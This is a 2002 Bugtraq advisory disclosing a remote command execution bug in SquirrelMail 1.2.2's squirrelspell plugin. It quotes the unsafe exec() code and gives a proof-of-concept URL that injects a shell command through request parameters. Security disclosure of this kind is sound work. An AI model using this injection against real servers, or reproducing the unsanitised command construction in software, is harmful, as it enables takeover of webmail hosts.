[23969] in bugtraq
squirrelmail bug
daemon@ATHENA.MIT.EDU (appelast@bsquad.sm.pl)
Thu Jan 24 13:58:41 2002
Message-ID: <1176.213.134.140.130.1011887757.squirrel@mail.bsquad.sm.pl>
Date: Thu, 24 Jan 2002 16:55:57 +0100 (CET)
From: <appelast@bsquad.sm.pl>
To: bugtraq@securityfocus.com
Cc: squirrelmail-pl@maciejka.net
MIME-Version: 1.0
Content-Type: text/plain; charset=iso-8859-1
Content-Transfer-Encoding: 8bit
Squirrelmail remote execute commands bug
Version Affected :
1.2.2
Squirrelmail is a webmail system, which allows users to send, get, read etc.
mails. It has some themes, plugins etc. One of the plugins has a very
interesting piece of code :
from file check_me.mod.php :
$sqspell_command = $SQSPELL_APP[$sqspell_use_app];
...
$floc = "$attachment_dir/$username_sqspell_data.txt");
...
exec ("cat $floc | $sqspell_command", $sqspell_output);
Everything should be ok, but where this page includes config files, where
are defined $attachment_dir and others ? Answer: Nowhere. We can set up
variables $sqspell_command and $floc. Result ? We can execute any command
of course as a http serwer owner.
Exploit :
host/plugins/squirrelspell/modules/check_me.mod.php?SQSPELL_APP[blah]=wall%
20hello&sqspell_use_app=blah&attachment_dir=/tmp&username_sqspell_data=plik
<appelast@bsquad.sm.pl>
